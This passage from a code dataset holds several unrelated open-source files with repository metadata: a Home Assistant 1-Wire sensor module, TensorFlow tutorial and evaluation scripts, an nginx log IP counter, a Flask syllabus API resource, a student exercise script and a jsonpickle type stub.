device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity HIH4000\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"HIH5030/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity HIH5030\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"HTM1735/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity HTM1735\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"B1-R1-A/pressure\",\n 
device_class=SensorDeviceClass.PRESSURE,\n entity_registry_enabled_default=False,\n name=\"Pressure\",\n native_unit_of_measurement=PRESSURE_MBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"S3-R1-A/illuminance\",\n device_class=SensorDeviceClass.ILLUMINANCE,\n entity_registry_enabled_default=False,\n name=\"Illuminance\",\n native_unit_of_measurement=LIGHT_LUX,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"VAD\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"Voltage VAD\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"VDD\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"Voltage VDD\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"vis\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"vis\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"28\": (\n OneWireSensorEntityDescription(\n key=\"temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n override_key=_get_sensor_precision_family_28,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"30\": (\n SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,\n OneWireSensorEntityDescription(\n key=\"typeX/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n entity_registry_enabled_default=False,\n name=\"Thermocouple temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n override_key=lambda d, o: \"typeK/temperature\",\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"volt\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"Voltage\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"vis\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"vis\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"3B\": (SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,),\n \"42\": (SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,),\n \"1D\": tuple(\n OneWireSensorEntityDescription(\n key=f\"counter.{id}\",\n name=f\"Counter {id}\",\n native_unit_of_measurement=\"count\",\n read_mode=READ_MODE_INT,\n state_class=SensorStateClass.TOTAL_INCREASING,\n )\n for id in DEVICE_KEYS_A_B\n ),\n}\n\n# EF sensors are usually hobbyboards specialized sensors.\n# These can only be read by OWFS. 
Currently this driver only supports them\n# via owserver (network protocol)\n\nHOBBYBOARD_EF: dict[str, tuple[OneWireSensorEntityDescription, ...]] = {\n \"HobbyBoards_EF\": (\n OneWireSensorEntityDescription(\n key=\"humidity/humidity_corrected\",\n device_class=SensorDeviceClass.HUMIDITY,\n name=\"Humidity\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"humidity/humidity_raw\",\n device_class=SensorDeviceClass.HUMIDITY,\n name=\"Humidity Raw\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"humidity/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"HB_MOISTURE_METER\": tuple(\n OneWireSensorEntityDescription(\n key=f\"moisture/sensor.{id}\",\n device_class=SensorDeviceClass.PRESSURE,\n name=f\"Moisture {id}\",\n native_unit_of_measurement=PRESSURE_CBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n )\n for id in DEVICE_KEYS_0_3\n ),\n}\n\n# 7E sensors are special sensors by Embedded Data Systems\n\nEDS_SENSORS: dict[str, tuple[OneWireSensorEntityDescription, ...]] = {\n \"EDS0066\": (\n OneWireSensorEntityDescription(\n key=\"EDS0066/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"EDS0066/pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n name=\"Pressure\",\n native_unit_of_measurement=PRESSURE_MBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"EDS0068\": (\n OneWireSensorEntityDescription(\n key=\"EDS0068/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"EDS0068/pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n name=\"Pressure\",\n native_unit_of_measurement=PRESSURE_MBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"EDS0068/light\",\n device_class=SensorDeviceClass.ILLUMINANCE,\n name=\"Illuminance\",\n native_unit_of_measurement=LIGHT_LUX,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"EDS0068/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n name=\"Humidity\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n}\n\n\ndef get_sensor_types(\n device_sub_type: str,\n) -> dict[str, tuple[OneWireSensorEntityDescription, ...]]:\n \"\"\"Return the proper info array for the device type.\"\"\"\n if \"HobbyBoard\" in device_sub_type:\n return HOBBYBOARD_EF\n if \"EDS\" in device_sub_type:\n return EDS_SENSORS\n return DEVICE_SENSORS\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up 1-Wire platform.\"\"\"\n onewirehub = hass.data[DOMAIN][config_entry.entry_id]\n entities = await 
hass.async_add_executor_job(\n get_entities, onewirehub, config_entry.data, config_entry.options\n )\n async_add_entities(entities, True)\n\n\ndef get_entities(\n onewirehub: OneWireHub,\n config: MappingProxyType[str, Any],\n options: MappingProxyType[str, Any],\n) -> list[SensorEntity]:\n \"\"\"Get a list of entities.\"\"\"\n if not onewirehub.devices:\n return []\n\n entities: list[SensorEntity] = []\n conf_type = config[CONF_TYPE]\n # We have an owserver on a remote(or local) host/port\n if conf_type == CONF_TYPE_OWSERVER:\n assert onewirehub.owproxy\n for device in onewirehub.devices:\n if TYPE_CHECKING:\n assert isinstance(device, OWServerDeviceDescription)\n family = device.family\n device_type = device.type\n device_id = device.id\n device_info = device.device_info\n device_sub_type = \"std\"\n device_path = device.path\n if \"EF\" in family:\n device_sub_type = \"HobbyBoard\"\n family = device_type\n elif \"7E\" in family:\n device_sub_type = \"EDS\"\n family = device_type\n\n if family not in get_sensor_types(device_sub_type):\n continue\n for description in get_sensor_types(device_sub_type)[family]:\n if description.key.startswith(\"moisture/\"):\n s_id = description.key.split(\".\")[1]\n is_leaf = int(\n onewirehub.owproxy.read(\n f\"{device_path}moisture/is_leaf.{s_id}\"\n ).decode()\n )\n if is_leaf:\n description = copy.deepcopy(description)\n description.device_class = SensorDeviceClass.HUMIDITY\n description.native_unit_of_measurement = PERCENTAGE\n description.name = f\"Wetness {s_id}\"\n override_key = None\n if description.override_key:\n override_key = description.override_key(device_id, options)\n device_file = os.path.join(\n os.path.split(device.path)[0],\n override_key or description.key,\n )\n name = f\"{device_id} {description.name}\"\n entities.append(\n OneWireProxySensor(\n description=description,\n device_id=device_id,\n device_file=device_file,\n device_info=device_info,\n name=name,\n owproxy=onewirehub.owproxy,\n )\n )\n\n # We have a raw GPIO ow sensor on a Pi\n elif conf_type == CONF_TYPE_SYSBUS:\n for device in onewirehub.devices:\n if TYPE_CHECKING:\n assert isinstance(device, OWDirectDeviceDescription)\n p1sensor: OneWireInterface = device.interface\n family = p1sensor.mac_address[:2]\n device_id = f\"{family}-{p1sensor.mac_address[2:]}\"\n device_info = device.device_info\n description = SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION\n device_file = f\"/sys/bus/w1/devices/{device_id}/w1_slave\"\n name = f\"{device_id} {description.name}\"\n entities.append(\n OneWireDirectSensor(\n description=description,\n device_id=device_id,\n device_file=device_file,\n device_info=device_info,\n name=name,\n owsensor=p1sensor,\n )\n )\n\n return entities\n\n\nclass OneWireSensor(OneWireBaseEntity, SensorEntity):\n \"\"\"Mixin for sensor specific attributes.\"\"\"\n\n entity_description: OneWireSensorEntityDescription\n\n\nclass OneWireProxySensor(OneWireProxyEntity, OneWireSensor):\n \"\"\"Implementation of a 1-Wire sensor connected through owserver.\"\"\"\n\n entity_description: OneWireSensorEntityDescription\n\n @property\n def native_value(self) -> StateType:\n \"\"\"Return the state of the entity.\"\"\"\n return self._state\n\n\nclass OneWireDirectSensor(OneWireSensor):\n \"\"\"Implementation of a 1-Wire sensor directly connected to RPI GPIO.\"\"\"\n\n def __init__(\n self,\n description: OneWireSensorEntityDescription,\n device_id: str,\n device_info: DeviceInfo,\n device_file: str,\n name: str,\n owsensor: OneWireInterface,\n ) -> None:\n \"\"\"Initialize the 
sensor.\"\"\"\n super().__init__(\n description=description,\n device_id=device_id,\n device_info=device_info,\n device_file=device_file,\n name=name,\n )\n self._attr_unique_id = device_file\n self._owsensor = owsensor\n\n @property\n def native_value(self) -> StateType:\n \"\"\"Return the state of the entity.\"\"\"\n return self._state\n\n async def get_temperature(self) -> float:\n \"\"\"Get the latest data from the device.\"\"\"\n attempts = 1\n while True:\n try:\n return await self.hass.async_add_executor_job(\n self._owsensor.get_temperature\n )\n except UnsupportResponseException as ex:\n _LOGGER.debug(\n \"Cannot read from sensor %s (retry attempt %s): %s\",\n self._device_file,\n attempts,\n ex,\n )\n await asyncio.sleep(0.2)\n attempts += 1\n if attempts > 10:\n raise\n\n async def async_update(self) -> None:\n \"\"\"Get the latest data from the device.\"\"\"\n try:\n self._value_raw = await self.get_temperature()\n self._state = round(self._value_raw, 1)\n except (\n FileNotFoundError,\n InvalidCRCException,\n UnsupportResponseException,\n ) as ex:\n _LOGGER.warning(\n \"Cannot read from sensor %s: %s\",\n self._device_file,\n ex,\n )\n self._state = None\n","repo_name":"turbokongen/onewire-sysbus","sub_path":"custom_components/onewire-sysbus/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":19849,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"44674275540","text":"''' Create variables, which is mutable tensor values\nVariables handle by session, so we must init them inside a Session\n'''\n\nimport tensorflow as tf\nimport numpy as np\n\nmy_var = tf.Variable(1, name=\"my_variable\")\n\nadd = tf.add(5, my_var)\nmul = tf.multiply(3, my_var)\n\n# we can use helper ops to create common tensor type\n# 2x2 matrix of zeros\nzeros = tf.zeros([2, 2])\n\n# vector with length = 6 of ones\nones = tf.ones([6])\n\n# 3x3x3 Tensor of random uniform values between 0 to 10\nuniform = tf.random_uniform([3,3,3], minval=0, maxval=10)\n\n# 3x3x3 Tensor of normal distribution values, mean = 0, standard deviation = 2\nnormal = tf.random_normal([3,3,3], mean=0.0, stddev=2.0)\n\n# 2x2 Tensor of distribution without values <3 and >7\ntrunc = tf.truncated_normal([2,2], mean=5.0, stdded=1.0)\n\n# Fast declaration\nrandom_var = tf.Variable(tf.truncated_normal([2,2]))\n\n# Initialize all the variables\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n# Initialize a subset of variables\nvar1 = tf.Variable(0, name=\"initizlize_this\")\nvar2 = tf.Variable(1, name=\"leave_this_alone\")\ninit1 = tf.initialize_variables([var1], name=\"init_var1\")\nsess.run(init1)\n","repo_name":"HuynhLam/tf","sub_path":"sam/create_variables.py","file_name":"create_variables.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36391130697","text":"from collections import Counter\n\naccess_ip = []\nwith open(\"/var/log/nginx/access.log\") as file:\n data_access = [line.strip().split(' ') for line in file]\n for data in data_access:\n access_ip.append(data[0])\n\ndata_ip = Counter(access_ip).most_common()\n\nwith open('/opt/report.txt', 'w') as file:\n for ip in data_ip:\n file.write(str(ip).strip('()').replace(\",\", \" 
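# The IP tally in this record can be written more compactly: Counter.most_common
# already sorts by count, and feeding Counter a generator keeps memory flat on a
# large log. A minimal sketch, reusing the same log path assumed above:
from collections import Counter

with open("/var/log/nginx/access.log") as f:
    top10 = Counter(line.split(" ", 1)[0] for line in f).most_common(10)
for ip, hits in top10:
    print(ip, hits)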
\")+'\\n')\n","repo_name":"Bgmraul/admin","sub_path":"nginx-metrics-reporter.py","file_name":"nginx-metrics-reporter.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71673125559","text":"# coding=utf-8\n__author__ = 'smallfly'\n\nfrom flask_restful import Resource\nfrom flask_restful.reqparse import RequestParser\nfrom app.mod_interaction.database_operations import common\nfrom app.mod_interaction import models\nfrom app import db\n\ndef delete_record(db, record):\n try:\n # 删除数据\n db.session.delete(record)\n db.session.commit()\n return True\n except Exception as e:\n db.session.rollback()\n return False, e\n\ndef check_token(user, token):\n token_check = {\n \"uid\": user.id,\n \"token\": token\n }\n return common.check_token(token_check)\n\n\nclass SyllabusCollectionResource(Resource):\n \"\"\"\n 用于记录课表\n \"\"\"\n\n POST_PARSER = RequestParser(trim=True)\n GET_PARSER = RequestParser(trim=True)\n DELETE_PARSER = RequestParser(trim=True)\n\n def get(self):\n \"\"\"\n 申请人获取用户已经上传的课表数据\n 地址: /interaction/api/v2/syllabus_collection\n 方法: GET\n 参数:\n 位置: headers\n 必须参数:\n username 用户账号\n token 验证令牌\n collectionID 之前申请到的获取id\n :return:\n \"\"\"\n self.GET_PARSER.add_argument(\"username\", required=True, location=\"headers\")\n self.GET_PARSER.add_argument(\"token\", required=True, location=\"headers\")\n # header里面的键名不能有下划线\n self.GET_PARSER.add_argument(\"collectionID\", required=True, location=\"headers\")\n\n args = self.GET_PARSER.parse_args()\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n\n if not check_token(user, args[\"token\"]):\n return {\"error\": \"token is wrong\"}, 401\n\n collector = common.query_single_by_filed(models.Collector, \"collection_id\", args[\"collectionID\"])\n if collector is None:\n # 表明用户输入了错误的collection_id\n return {\"error\": \"wrong collection_id\"}, 404\n\n # 检查权限\n if collector.uid != user.id:\n return {\"error\": \"have not the permission\"}, 403\n\n collections = models.SyllabusCollection.query.filter_by(collection_id=args[\"collectionID\"]).all()\n collections = [ dict(id=x.id, account=x.account, syllabus=x.syllabus) for x in collections ]\n return {\"collections\": collections}\n\n\n def post(self):\n \"\"\"\n 发送课表数据到服务器\n 地址: /interaction/api/v2/syllabus_collection\n 方法: POST\n 参数:\n 位置: form\n 必选参数:\n username 用户账号\n token 验证令牌\n start_year 学年的开始年份\n season 某个学期, 和学分制对应\n syllabus 课表的JSON数据\n :return:\n \"\"\"\n self.POST_PARSER.add_argument(\"username\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"token\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"start_year\", type=int, required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"season\", type=int, required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"collection_id\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"syllabus\", required=True, location=\"form\")\n\n args = self.POST_PARSER.parse_args()\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n\n if not check_token(user, args[\"token\"]):\n return {\"error\": \"token is wrong\"}, 401\n\n collector = common.query_single_by_filed(models.Collector, \"collection_id\", args[\"collection_id\"])\n if collector is None:\n # 表明用户输入了错误的collection_id\n 
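# The get/post/delete handlers in this resource all repeat the same two checks:
# look up the user by account (404 if missing), then verify the token (401 if
# wrong). One possible refactor using this module's own helpers
# (common.query_single_by_filed, models.User, check_token); the `authenticate`
# name and the (user, error) tuple convention are illustrative, not part of the
# original file:
def authenticate(username, token):
    user = common.query_single_by_filed(models.User, "account", username)
    if user is None:
        return None, ({"error": "user doesn't exist"}, 404)
    if not check_token(user, token):
        return None, ({"error": "token is wrong"}, 401)
    return user, None

# usage inside a handler:
#   user, error = authenticate(args["username"], args["token"])
#   if error:
#       return error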
return {\"error\": \"wrong collection_id\"}, 404\n\n # 检查学期是否正确\n if collector.start_year != args[\"start_year\"] or collector.season != args[\"season\"]:\n return {\"error\": \"semester doesn't match\"}, 400\n\n collection = models.SyllabusCollection.query.filter_by(account=user.account).filter_by(collection_id=args[\"collection_id\"]).first()\n\n if collection is not None:\n # 删除原有记录\n status = delete_record(db, collection)\n if status != True:\n return {\"error\": repr(status[1])}, 500\n\n collection = models.SyllabusCollection(collection_id=args[\"collection_id\"], syllabus=args[\"syllabus\"], account=args[\"username\"])\n\n result = common.add_to_db(db, collection)\n if result == True:\n return {\"id\": collection.id}\n else:\n return {\"error\": \"commit error in mysql\"}, 500\n\n\n def delete(self):\n self.DELETE_PARSER.add_argument(\"username\", required=True, location=\"headers\")\n self.DELETE_PARSER.add_argument(\"token\", required=True, location=\"headers\")\n self.DELETE_PARSER.add_argument(\"id\", required=True, location=\"headers\")\n\n args = self.DELETE_PARSER.parse_args()\n # 检查token\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n\n if not check_token(user, args[\"token\"]):\n return {\"error\": \"token is wrong\"}, 401\n\n collection = common.query_single_by_id(models.SyllabusCollection, args[\"id\"])\n if collection is None:\n return {\"error\": \"collection not found\"}, 404\n\n if collection.account == args[\"username\"]:\n status = delete_record(db, collection)\n if status == True:\n return {\"status\": \"deleted\"}\n else:\n return {\"error\": repr(status[1])}, 500\n else:\n collector = common.query_single_by_filed(models.Collector, \"collection_id\", collection.collection_id)\n if collector is None:\n return {\"error\": \"collector not found\"}, 404\n if collector.uid == user.id:\n status = delete_record(db, collection)\n if status == True:\n return {\"status\": \"deleted\"}\n else:\n return {\"error\": repr(status[1])}, 500\n else:\n return {\"error\": \"have not the permission\"}, 403","repo_name":"xiaofud/syllabus_backend","sub_path":"app/mod_interaction/resources/SyllabusCollectionResource.py","file_name":"SyllabusCollectionResource.py","file_ext":"py","file_size_in_byte":6501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"12550760760","text":"from datetime import date\nimport queue\n\ndata = (\"Круглов Никита Викторович\", 30, 8, 2003)\n\ncertificate = {\n \"Русский язык\": 4,\n \"Литература\": 4,\n \"Иностранный язык\": 5,\n \"Алгебра и начала анализа\": 4,\n \"Геометрия\": 4,\n \"Информатика и ИКТ\": 4,\n \"История России\": 4,\n \"Всеобщая история\": 5,\n \"Обществознание\": 4,\n \"География\": 5,\n \"Химия\": 4,\n \"Биология\": 4,\n \"Физика\": 5,\n \"Астрономия\": 4,\n \"Физкультура\": 5,\n \"ОБЖ\": 5,\n \"Избранные разделы математики для старшей школы\": 4,\n \"Компьютерная инженерная графика\": 5 \n}\n\nfamily_names = [\"Никита 2003\", \"Виктория 2010\", \"Виктор 1970\", \"Людмила 1975\", \"Ксения 2018\", \"Дмитрий 1993\"]\n\nnamekiwa = \"Арагог\"\n\n\naverage_mark = sum(certificate.values())/len(certificate.values())\nprint(\"1.Средняя оценка в аттестате:\", average_mark)\n\nunique_names = list(set(family_names))\nprint(\"2.Уникальные имена среди родственников:\\n\", unique_names)\n\ncer_len = [0]*len(certificate.values())\ncount = 0\ndisk_marks_string = \"\"\nfor i in 
certificate.keys():\n cer_len[count] = i\n disk_marks_string += cer_len[count]\n count += 1\nprint(\"3.Общая длина всех названий предметов:\", len(disk_marks_string))\n\nunique_letters = set()\nfor cer in certificate:\n unique_letters.update(certificate)\nprint(\"4.Уникальные буквы в названиях предметов:\", unique_letters)\n\nbin_kiwa_name = list(format(c, 'b') for c in bytearray(namekiwa, \"utf-8\"))\nprint(\"5.Имя пушистой кивы в бинарном виде:\", namekiwa)\n\nsorted_names = sorted(family_names, reverse=True)\nprint(\"6.Отсортированный по алфавиту в обратном порядке список родственников:\", sorted_names)\n\nprint(\"7.Количество дней от даты рождения до текущей даты: {}\".format((date.today() - date(day=int(data[1]), month=int(data[2]), year=int(data[3]))).days))\n\nq = queue.Queue()\nprint('Чтобы прекратить ввод введите end: ')\nwhile True:\n subject = input(' ')\n if subject == 'end':\n break\n else:\n q.put(subject)\nprint(\"8.FIFO очередь: \")\nwhile True:\n print(q.get(), end=', ')\n if q.empty()==True:\n break\n\nAztec= ['Tenoch', 'Acamapochtli', 'Huitzilihitl', 'Chimalpopoca', 'Xihuitl Temoc',\n 'Itzcoatl', 'Moctezuma I', 'Atotoztli', 'Axayacatl', 'Tizoc', 'Ahuitzotl',\n 'Moctezuma II', 'Cuitlahuac', 'Cuauhtrmoc', 'Tlacotzin', 'Motelchiuhtzin',\n 'Xochiquentzin', 'Huanitzin', 'Tehuetzquititzin', 'Cecetzin', 'Cipac']\nnumber = (int(data[1]) + int(data[2])**2 + int(data[3])) % 21 + 1\nindex = input(\"Введите индекс\")\nindex = int(index)\nif index >= 0 and index < len(sorted_names):\n sorted_names[index] = Aztec[number]\n\nprint(\"9.Cписок родственников:\", sorted_names)\n\nfamilynameslinked = {\"Никита 2003\":1, \"Виктория 2010\":2, \"Виктор 1970\":3, \"Людмила 1975\":4, \"Ксения 2018\":5, \"Дмитрий 1993\":6}\nprint(\"10.Список\", familynameslinked)\n\nnumber = (len(data[0]) * len(family_names)) % 4\n\n\ndef tribonacci_generator():\n a, b, c = 0, 0, 1\n yield a\n yield b\n yield c\n\n while True:\n next_num = a + b + c\n yield next_num\n a, b, c = b, c, next_num\n\n\nn = 10\n\ntribonacci = tribonacci_generator()\ntribonacci_sequence = [next(tribonacci) for _ in range(n)]\n\nprint(\"11.Последовательность чисел Трибоначчи:\")\nprint(tribonacci_sequence)\n","repo_name":"kit8nino/2023-MP","sub_path":"426/Kruglov Nikita/[1].py","file_name":"[1].py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72937538681","text":"from typing import Any, Dict, Optional, Callable, Tuple\r\n\r\ndef encode(data: Dict[str,Any],\r\n unpicklable: bool = True,\r\n make_refs: bool = True,\r\n keys: bool = False,\r\n max_depth: Optional[int] = None,\r\n reset: bool = True,\r\n backend: Any = None,\r\n warn: bool = False,\r\n context: Any = None,\r\n max_iter: Optional[int] = None,\r\n use_decimal: bool = False,\r\n numeric_keys: bool = False,\r\n use_base85: bool = False,\r\n fail_safe: Optional[Callable[[], None]] = None,\r\n indent: Optional[int] = None,\r\n separators: Optional[Tuple[str]] = None) -> str: ...\r\ndef decode(data: str,\r\n backend: Any = None,\r\n context: Any = None,\r\n keys: bool = False,\r\n reset: bool = True,\r\n safe: bool = False,\r\n classes: Any = None) -> Dict[str,Any]: ...","repo_name":"lexasss/carla-mirror","sub_path":"typings/jsonpickle/__init__.pyi","file_name":"__init__.pyi","file_ext":"pyi","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2264319182","text":"# Lint as: 
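# The .pyi stub record above only declares signatures for jsonpickle's two entry
# points. A minimal round trip with the real library (assuming jsonpickle is
# installed) looks like this; note encode() accepts arbitrary objects, not only
# dicts, despite the stub's narrower annotation:
import jsonpickle

class Point:
    def __init__(self, x, y):
        self.x, self.y = x, y

frozen = jsonpickle.encode(Point(1, 2))   # JSON string tagged with the class
thawed = jsonpickle.decode(frozen)        # rebuilt as a Point instance
assert (thawed.x, thawed.y) == (1, 2)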
python3\n\"\"\"Evaluation script.\"\"\"\n\nimport os\nimport yaml\nfrom absl import app\nfrom absl import flags\nimport tensorflow as tf\nimport gc\n\nfrom data_lib.get_segmentation_dataset import get_segmentation_dataset\nfrom evaluation_lib import evaluate_utils\nfrom model_lib.baselines_seg import EnsembleSeg\nfrom training_lib.utils import load_model_segmentation\nfrom data_lib.get_segmentation_dataset import get_cityscapes_testset\nfrom data_lib.get_segmentation_dataset import load_cityscapes_testset_np\n\n\n# Define Flags.\nflags.DEFINE_list( # exp_name is list for compatibility of ensembles\n 'exp_name', '', 'Name of the experiment to be evaluated.')\nflags.DEFINE_string(\n 'exp_root', '', 'Root directory of experiments.')\nflags.DEFINE_bool('mcd', False, 'Use MC dropout for uncertainty estimation.')\nflags.DEFINE_bool('mir', False, 'Use MIR for uncertainty estimation.')\nflags.DEFINE_integer('nr_samples', 10, 'Number of samples for MC dropout.')\nflags.DEFINE_bool('debug', False, 'Debug mode. Eager execution.')\n\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n\n print('Evaluating model...', flush=True)\n\n tf.config.run_functions_eagerly(FLAGS.debug)\n\n # get experiment folder and create dir for plots\n exp_folders = [os.path.join(FLAGS.exp_root, name) for name in FLAGS.exp_name]\n results_folder = os.path.join(exp_folders[0], 'results')\n tf.io.gfile.mkdir(results_folder)\n\n # get experiment FLAGS\n TRAINING_FLAGS = yaml.load(\n tf.io.gfile.GFile(os.path.join(exp_folders[0], 'FLAGS.yml'), 'r'),\n Loader=yaml.Loader)\n if 'ensemble' not in TRAINING_FLAGS.keys():\n TRAINING_FLAGS['ensemble'] = False\n\n # get in-distribution datasets\n print('Loading dataset...', flush=True)\n TRAINING_FLAGS['batch_size'] = 1 # evaluate with batch_size 1\n\n # get dataset\n data_root = TRAINING_FLAGS['data_root']\n trainset, valset, testset = get_segmentation_dataset(\n TRAINING_FLAGS['dataset'],\n data_root=data_root,\n batch_size=TRAINING_FLAGS['batch_size'])\n if TRAINING_FLAGS['dataset'] == 'cityscapes':\n print('Loading numpy testset ...', flush=True)\n testset_np = load_cityscapes_testset_np(\n data_root=data_root, testset=testset)\n print('Finished loading numpy testset ...', flush=True)\n\n if FLAGS.mcd:\n TRAINING_FLAGS['method'] = 'dropout'\n if FLAGS.mir:\n TRAINING_FLAGS['method'] = 'mir'\n TRAINING_FLAGS['reconstruction_weight'] = 0 # does not matter during inference\n\n # create model and load weights\n if len(exp_folders) == 1:\n model, _ = load_model_segmentation(\n method=TRAINING_FLAGS['method'],\n hyperparameters=TRAINING_FLAGS,\n exp_folder=exp_folders[0],\n trainset=trainset,\n valset=valset,\n load_weights=True,\n evaluation=True)\n elif len(exp_folders) > 1: # more than 1 exp_name --> ensemble method\n TRAINING_FLAGS['ensemble_size'] = len(exp_folders)\n model = EnsembleSeg(**TRAINING_FLAGS)\n\n # call model once for init\n _, init_input = enumerate(testset).__next__()\n _ = model(init_input[0])\n\n try:\n model.custom_load_weights(filepath=[os.path.join(f, 'best_model.h5') for f in exp_folders])\n except:\n model.custom_load_weights(filepath=[os.path.join(f, 'best_model.tf') for f in exp_folders])\n model.compile()\n else:\n raise ValueError('Unknown method!')\n\n #########################################\n # compute metrics for calibration of\n # epistemic uncertainty under distributional shift\n #########################################\n print('Evaluate Calibration')\n # if TRAINING_FLAGS['dataset'] == 'cityscapes':\n # test_predictions = evaluate_utils.predict_uncertainty(\n # 
